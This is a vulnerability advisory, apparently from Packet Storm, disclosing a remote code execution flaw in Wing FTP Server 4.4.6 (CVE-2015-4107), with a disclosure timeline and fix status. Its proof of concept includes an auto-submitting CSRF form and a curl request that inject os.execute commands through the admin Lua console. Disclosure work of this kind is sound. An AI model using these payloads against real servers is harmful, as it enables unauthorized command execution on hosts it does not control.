exploit the possibilities

Wing FTP 4.4.6 Code Execution / Cross Site Request Forgery

Wing FTP 4.4.6 Code Execution / Cross Site Request Forgery
Posted Jun 5, 2015
Authored by Alex Haynes

Wing FTP server version 4.4.6 suffers from remote code execution and cross site request forgery vulnerabilities.

tags | exploit, remote, vulnerability, code execution, csrf
advisories | CVE-2015-4107
MD5 | 44dec89b40a8814f3d57e5d6f6605547

Wing FTP 4.4.6 Code Execution / Cross Site Request Forgery

Change Mirror Download
Exploit Title: Wing FTP Server Remote Code Execution vulnerability
Product: Wing FTP Server
Vulnerable Versions: 4.4.6 and all previous versions
Tested Version: 4.4.6
Advisory Publication: 05/06/2015
Latest Update: 05/06/2015
Vulnerability Type: Improper Control of Generation of Code [CWE-94]
CVE Reference: CVE-2015-4107
Credit: Alex Haynes

Advisory Details:


(1) Vendor & Product Description
--------------------------------
Vendor:Wing FTP software


Product & Version:
Wing FTP Server v 4.4.6

Vendor URL & Download:
http://www.wftpserver.com/

Product Description:
"Wing FTP Server is an easy-to-use, secure and feature-rich enterprise FTP Server that can be used in Windows, Linux, Mac OSX and Solaris. It supports a number of file transfer protocols, including FTP, HTTP, FTPS, HTTPS and SFTP server, giving your end-users flexibility in how they connect to the server. And it provides admins with a web based interface to administrate the server from anywhere. You can also monitor server performance and online sessions and even receive email notifications about various events taking place on the server."


(2) Vulnerability Details:
--------------------------
The admin interface of Wing FTP Server is vulnerable to a Remote Code Execution (RCE) vulnerability.

Proof of concept for RCE [CVE-2015-4107]:
-----------------------------------------

The RCE can be exploited in two scenarios, either by a CSRF attack (the admin interface is vulnerable to CSRF attacks) or by being authenticated to the admin interface. The attack leverages the LUA CLI to inject commands at the same privilege as the web server.

The RCE via CSRF POC

<html>
<body>
<form action="http://<server address>:5466/admin_lua_script.html" method="POST" enctype="text/plain">
<input type="hidden" name="command" value="os.execute('<any OS command here>')" />
<input type="submit" value="Submit request" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>

RCE via authenticated administrator

1) Either utilising the LUA Console interface directly and using the os.execute('<OS command here>') method.
2) POST directly using CURL with an authenticated cookie:
curl -i -s -k -X 'POST' -b 'admin_lang=english; UIDADMIN=b8b208e2239f462c11641eaa10cde7b0' --data-binary $'command=os.execute(\'cmd.exe\')'
'http://<server address>:5466/admin_lua_script.html'

Parameter names: "command"
Parameter Type: POST
Attack Pattern:
Any OS command can be inserted into the os.execute('') method.


(3) Advisory Timeline:
----------------------
27/05/2015 - First Contact
27/05/2015 - Vendor responds with requests for details of vulnerabilities.
28/05/2015 - Vulnerability details sent with POC.
28/05/2015 - Vendor requests clarification on impact and various attack scenarios.
28/05/2015 - Vulnerability scenarios defined.
29/05/2015 - Vulnerability confirmed and new version 4.4.7 released. Requests a week delay before public disclosure.
05/06/2015 - Public disclosure

(4)Solution:
------------
CSRF attack vector fixed in version 4.4.7. No fix for authenticated RCE at this time.


(5) Credits:
------------
Discovered by Alex Haynes

References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4107
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-4107

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

August 2019

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Aug 1st
    10 Files
  • 2
    Aug 2nd
    8 Files
  • 3
    Aug 3rd
    2 Files
  • 4
    Aug 4th
    1 Files
  • 5
    Aug 5th
    15 Files
  • 6
    Aug 6th
    79 Files
  • 7
    Aug 7th
    16 Files
  • 8
    Aug 8th
    10 Files
  • 9
    Aug 9th
    10 Files
  • 10
    Aug 10th
    0 Files
  • 11
    Aug 11th
    6 Files
  • 12
    Aug 12th
    26 Files
  • 13
    Aug 13th
    15 Files
  • 14
    Aug 14th
    19 Files
  • 15
    Aug 15th
    52 Files
  • 16
    Aug 16th
    11 Files
  • 17
    Aug 17th
    1 Files
  • 18
    Aug 18th
    1 Files
  • 19
    Aug 19th
    18 Files
  • 20
    Aug 20th
    0 Files
  • 21
    Aug 21st
    0 Files
  • 22
    Aug 22nd
    0 Files
  • 23
    Aug 23rd
    0 Files
  • 24
    Aug 24th
    0 Files
  • 25
    Aug 25th
    0 Files
  • 26
    Aug 26th
    0 Files
  • 27
    Aug 27th
    0 Files
  • 28
    Aug 28th
    0 Files
  • 29
    Aug 29th
    0 Files
  • 30
    Aug 30th
    0 Files
  • 31
    Aug 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2019 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close